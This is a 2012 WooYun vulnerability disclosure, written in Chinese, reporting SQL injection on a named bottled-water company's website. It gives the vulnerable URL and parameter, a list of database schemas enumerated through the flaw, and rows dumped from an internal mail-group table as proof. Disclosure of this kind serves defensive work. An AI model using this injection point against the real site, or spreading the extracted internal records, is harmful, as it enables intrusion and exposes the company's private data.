漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-05929
漏洞标题:某知名矿泉水官网存在Sql注入漏洞,导致相关信息泄漏
相关厂商:农夫山泉
漏洞作者: expdigger
提交时间:2012-04-11 10:45
修复时间:2012-05-26 10:46
公开时间:2012-05-26 10:46
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
没有对Sql注入攻击进行有效防范,此漏洞可直接导致公司涉密信息外泄。
详细说明:
直接提交Sql注入漏洞位置
http://www.nongfuspring.com/app/newsDetail.action?headtodetailId=853
漏洞证明:
由于数据敏感,请公司负责人,参考一下内容吧!
[*] AWARD
[*] BOAPP
[*] BUDGET
[*] CMS
[*] CMS_WW
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GCJK
[*] GTS
[*] LTWG
[*] MDSYS
[*] OABG
[*] ORDSYS
[*] OSAP
[*] OUTLN
[*] SCORES
[*] SCOTT
[*] SHOW
[*] SMSUSER
[*] SOP
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] VENDOR
[*] WF_ENGINE
[*] WMSYS
[*] WSAP
[*] XDB
[*] YDWG
[*] YY_WWW
-------------------------------------------
Database: SMSUSER
Table: B_MAIL_GROUP
+-------------+---------+------------+-------+----------------+----------------+----------+----------+-------------+
| CREATE_DATE | MEMBERS | MG_CREATER | MG_ID | MG_NAME | MG_NAME_CN | MG_ORGID | MG_STATE | MODIFY_DATE |
+-------------+---------+------------+-------+----------------+----------------+----------+----------+-------------+
| 25-MAY-06 | 6 | 62815 | 3 | oapm | OA项目组邮箱组 | 1702 | Y | 21-DEC-10 |
| 12-AUG-06 | 8 | 62815 | 4 | nfydsw_zb | 农夫移动商务总部项目组 | 1702 | Y | 21-DEC-10 |
| 12-AUG-06 | 16 | 62815 | 5 | nfydsw_dx | 农夫移动商务大区项目组 | 1702 | Y | 21-DEC-10 |
| 12-AUG-06 | 20 | 62815 | 6 | nfydsw_cs | 农夫移动商务城市项目组 | 1702 | Y | 21-DEC-10 |
| 26-SEP-06 | 31 | 62815 | 11 | mtnf | 农夫山泉06培训生 | 1702 | Y | 21-DEC-10 |
修复方案:
建议过滤请求中特殊字符,并提高网站安全审计等级!
版权声明:转载请注明来源 expdigger@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝